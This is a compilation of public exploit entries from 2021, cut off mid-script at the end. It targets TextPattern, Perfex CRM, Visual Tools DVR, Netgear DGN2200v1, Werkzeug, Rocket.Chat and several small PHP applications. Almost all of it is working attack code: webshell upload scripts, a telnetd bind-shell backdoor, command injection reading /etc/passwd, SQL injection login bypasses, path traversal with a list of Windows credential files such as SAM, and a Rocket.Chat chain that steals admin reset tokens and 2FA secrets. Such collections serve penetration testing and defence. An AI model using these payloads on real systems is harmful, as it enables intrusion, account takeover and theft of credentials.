# Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated) # Date: 07/04/2021 # Exploit Author: Mevlüt Akçam # Software Link: https://github.com/textpattern/textpattern # Vendor Homepage: https://textpattern.com/ # Version: 4.9.0-dev # Tested on: 20.04.1-Ubuntu #!/usr/bin/python3 import requests from bs4 import BeautifulSoup as bs4 import json import string import random import argparse # Colors RED="\033[91m" GREEN="\033[92m" RESET="\033[0m" parser = argparse.ArgumentParser() parser.add_argument('-t', '--url', required=True, action='store', help='Target url') parser.add_argument('-u', '--user', required=True, action='store', help='Username') parser.add_argument('-p', '--password', required=True, action='store', help='Password') args = parser.parse_args() URL=args.url uname=args.user passwd=args.password session=requests.Session() def login(uname,passwd): data={'lang':'en','p_userid':uname,'p_password':passwd} r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False) if r_login.status_code == 200: print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET) else: print(RED,f"[-] Login failed",RESET) exit() def get_token(): print(GREEN,f"[+] Getting token ",RESET) r_token=session.get(URL+"/textpattern/index.php?event=plugin") soup = bs4(r_token.text, 'html.parser') textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1] textpattern = json.loads(textpattern) return textpattern['_txp_token'] def upload(): file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10)) file={ 'theplugin':( file_name+".php", """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?> </pre> </body> </html> <!-- """+file_name+" -->" ),# The file_name is used to verify that the file has been uploaded. 'install_new':(None,'Upload'), 'event':(None,'plugin'), 'step':(None,'plugin_upload'), '_txp_token':(None,get_token()), } r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file) if file_name in r_upload.text: print(GREEN,f"[+] Shell uploaded",RESET) print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET) else: print(RED,f"[-] Shell failed to load",RESET) print(RED,f"[-] Bye",RESET) exit() if __name__=="__main__": login(uname,passwd) upload() print(GREEN,f"[+] Bye",RESET)

# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) # Date: 05/07/2021 # Exploit Author: Alhasan Abbas (exploit.msf) # Vendor Homepage: https://www.perfexcrm.com/ # Version: 1.10 # Tested on: windows 10 Vunlerable page: /clients/profile POC: ---- POST /clients/profile HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 Content-Length: 1548 Origin: http://localhost Connection: close Referer: http://localhost/clients/profile Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 Upgrade-Insecure-Requests: 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile_image"; filename="" Content-Type: application/octet-stream -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="firstname" adfgsg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="lastname" fsdgfdg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="company" test -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="vat" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="phonenumber" -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="country" 105 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="city" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="address" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="zip" 313 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="state" ""><body onload=alert("XSS")>"> -----------------------------325278703021926100783634528058-- then any one open profile page in user the xss its executed

# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. # CVE: CVE-2021-42071 # Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/ # An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution. curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py

# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgear.com/ # Version: All prior to v1.0.0.60 #!/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL ([email protected]) Date: 02.07.2021 Status: Patched in some models Version: All prior to v1.0.0.60 Impact: Critical CVE: No CVE number assigned PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 References: 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 The exploit script only works on UNIX-based systems. This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. """ import sys import requests import os target_ip = "192.168.0.1" telnet_port = 666 sent = False def main(): if len(sys.argv) < 3: print "./dgn2200_pwn.py <router ip> <backdoor-port>" exit() target_ip = sys.argv[1] telnet_port = int(sys.argv[2]) print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." send_payload() print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." print "[!] If it fails to connect it means the target is probably not vulnerable" spawn_shell() def send_payload(): try: requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") sent = True except Exception: sent = False print "[-] Unknown error, target might not be vulnerable." def spawn_shell(): if sent: print "[+] Dropping a shell..." os.system("telnet " + target_ip + " " + telnet_port) else: exit() if __name__ == "__main__": main()

# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion # Date: 05.07.2021 # Exploit Author: Ferhat Çil # Vendor Homepage: http://www.blackbox.com/ # Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm # Version: 3.4.31307 # Category: Webapps # Tested on: Linux # Description: Any user can read files from the server # without authentication due to an existing LFI in the following path: # http://target//cgi-bin/show?page=FilePath import requests import sys if name == 'main': if len(sys.argv) == 3: url = sys.argv[1] payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] r = requests.get(payload) print(r.text) else: print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')

# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html # Version: V 1.0 # Tested on: Linux & Windows import requests import random import string from bs4 import BeautifulSoup let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) randstr = ''.join(random.choice(let) for i in range(15)) payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" url = input("Target : ") session = requests.session() reqUrl = url + "login.php" reqHead = {"Content-Type": "application/x-www-form-urlencoded"} reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''} session.post(reqUrl, headers=reqHead, data=reqData) print("Shell Uploading...") reqUrl = url + "php_action/createProduct.php" reqHead = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"} reqData = "\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productImage\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n" session.post(reqUrl, headers=reqHead, data=reqData) print("product name is "+randstr) print("shell name is "+shellname) reqUrl = url + "product.php" data = session.get(reqUrl) parser = BeautifulSoup(data.text, 'html.parser') find_shell = parser.find_all('img') for i in find_shell: if shellname in i.get("src"): print("Shell URL : " + url + i.get("src") + "?cmd=whoami")

# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal # Date: 06 July 2021 # Original Author: Emre ÖVÜNÇ # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://palletsprojects.com/ # Software Link: https://github.com/pallets/werkzeug # Version: Prior to 0.15.5 # Tested on: Windows Server # CVE: 2019-14322 # Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue # CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322 # Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/ Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download. #!/usr/bin/env python3 # PoC code by @faisalfs10x [https://github.com/faisalfs10x] """ $ pip3 install colorama==0.3.3, argparse, requests, urllib3 $ python3 CVE-2019-14322.py -l list_target.txt" """ import argparse import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) import requests from colorama import Fore, Back, Style, init # Colors red = '\033[91m' green = '\033[92m' white = '\033[97m' yellow = '\033[93m' bold = '\033[1m' end = '\033[0m' init(autoreset=True) def banner_motd(): print(Fore.CYAN +Style.BRIGHT +""" CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s """ % (bold, red, white, yellow, white, end)) banner_motd() # list of sensitive files to grab in windows # %windir%\repair\sam # %windir%\System32\config\RegBack\SAM # %windir%\repair\system # %windir%\repair\software # %windir%\repair\security # %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) # %windir%\iis6.log (5,6 or 7) # %windir%\system32\logfiles\httperr\httperr1.log # C:\sysprep.inf # C:\sysprep\sysprep.inf # C:\sysprep\sysprep.xml # %windir%\Panther\Unattended.xml # C:\inetpub\wwwroot\Web.config # %windir%\system32\config\AppEvent.Evt (Application log) # %windir%\system32\config\SecEvent.Evt (Security log) # %windir%\system32\config\default.sav # %windir%\system32\config\security.sav # %windir%\system32\config\software.sav # %windir%\system32\config\system.sav # %windir%\system32\inetsrv\config\applicationHost.config # %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml # %windir%\System32\drivers\etc\hosts (dns entries) # %windir%\System32\drivers\etc\networks (network settings) # %windir%\system32\config\SAM # TLDR: # C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml # C:/windows/system32/inetsrv/config/applicationHost.config # C:/windows/system32/logfiles/httperr/httperr1.log # C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account) # C:/windows/system32/drivers/etc/hosts - (dns entries) # C:/windows/system32/drivers/etc/networks - (network settings) def check(url): # There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :) for endpoint in [ 'https://{}/base_import/static/c:/windows/win.ini', #'https://{}/web/static/c:/windows/win.ini', #'https://{}/base/static/c:/windows/win.ini' ]: try: url2 = endpoint.format(url) resp = requests.get(url2, verify=False, timeout=5) if 'fonts' and 'files' and 'extensions' in resp.text: print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]") with open('CVE-2019-14322_result.txt', 'a+') as output: output.write('{}\n'.format(url2)) output.close() else: print(" [-] " +url+ " : not vulnerable") except KeyboardInterrupt: exit('User aborted!') except: print(" [-] " +url+ " : not vulnerable") def main(args): f = open(listfile, "r") for w in f: url = w.strip() check(url) if __name__ == '__main__': try: parser = argparse.ArgumentParser(description='CVE-2019-14322') parser.add_argument("-l","--targetlist",required=True, help = "target list in file") args = parser.parse_args() listfile = args.targetlist main(args) except KeyboardInterrupt: exit('User aborted!')

# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux # Proof of Concept : 1- Send Request to /pages/save_user.php. 2- Find your shell.php file path and try any command. ################################## REQUEST ############################### POST /pages/save_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 Content-Length: 369 -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/x-php <?php system($_GET['cmd']); ?> -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="btn_save" -----------------------------3767690350396265302394702877-- ################################## RESPONSE ############################# HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 02:16:18 GMT Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.3.28 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 ################################## Exploit ############################# <?php // Coder By Thamer Almohammadi(@Thamerz88); function exploit($scheme,$host,$path,$shell){ $url=$scheme."://".$host.$path; $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>'; $data = "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; $data .= "\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; $packet .= $data; $packet .= "\r\n"; send($host, $packet); sleep(2); check($url,$shell); } function send($host, $packet) { if ($connect = @fsockopen ($host, 80, $x, $y, 3)) { @fputs ($connect, $packet); @fclose ($connect); } } function check($url,$shell){ $check=file_get_contents($url."/uploadImage/Profile/".$shell); $preg=preg_match('/(File To Upload)/', $check, $output); if($output[0] == "File To Upload"){ echo "[+] Upload shell successfully.. :D\n"; echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; } else{ //Exploit Failed echo "[-] Exploit Failed..\n"; } } $options=getopt("u:s:"); if(!isset($options['u'], $options['s'])) die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n -u http://target.com = Target URL .. -s shell.php = Shell Name ..\n\n"); $url=$options["u"]; $shell=$options["s"]; $parse=parse_url($url); $host=$parse['host']; $path=$parse['path']; $scheme=$parse['scheme']; exploit($scheme,$host,$path,$shell); ?>

# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. #An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration. sudo mount -o bind /bin/sh /bin/mount sudo mount

# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC # ########### Request: ======== POST /osms/Execute/ExLogin.php HTTP/1.1 Host: localhost Content-Length: 43 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Username=or+1%3D1%2F*&Password=or+1%3D1%2F* Payload: ========= Username=or 1=1/* Password=or 1=1/*

# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal # Date: 05.07.2021 # Exploit Author: TheSmuggler # Vendor Homepage: https://gotmls.net/ # Software Link: https://gotmls.net/downloads/ # Version: <= 4.20.72 # Tested on: Windows import requests print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)

# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC 1: # ########### Request: ======== POST /osms/Execute/ExAddProduct.php HTTP/1.1 Host: localhost Content-Length: 2160 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/AddNewProduct.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 Connection: close ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductName" camera ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BrandName" soskod ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Quantity" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="TotalPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="DisplaySize" 15 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="OperatingSystem" windows ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Processor" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="InternalMemory" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="RAM" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="CameraDescription" lens ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BatteryLife" 3300 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Weight" 500 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Model" AIG34 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Dimension" 5 inch ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ASIN" 9867638 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductImage"; filename="rev.php" Content-Type: application/octet-stream <?php echo "result: ";system($_GET['rev']); ?> ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="date2" 2020-06-03 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Description" accept ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="_wysihtml5_mode" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0-- ########### # PoC 2: # ########### Request: ======== POST /osms/Execute/ExChangePicture.php HTTP/1.1 Host: localhost Content-Length: 463 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/UserProfile.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 Connection: close ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="IDUser" 6 ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="Image"; filename="rev.php" Content-Type: application/octet-stream <?php echo "output: ";system($_GET['rev']); ?> ------WebKitFormBoundary4Dm8cGBqGNansHqI-- ########### # Access: # ########### # Webshell access via: PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami # Output: result: windows10\user

# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 (2) # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat # Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def admin_token(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting reset token for admin cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:89] print(f"Got the reset token: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = 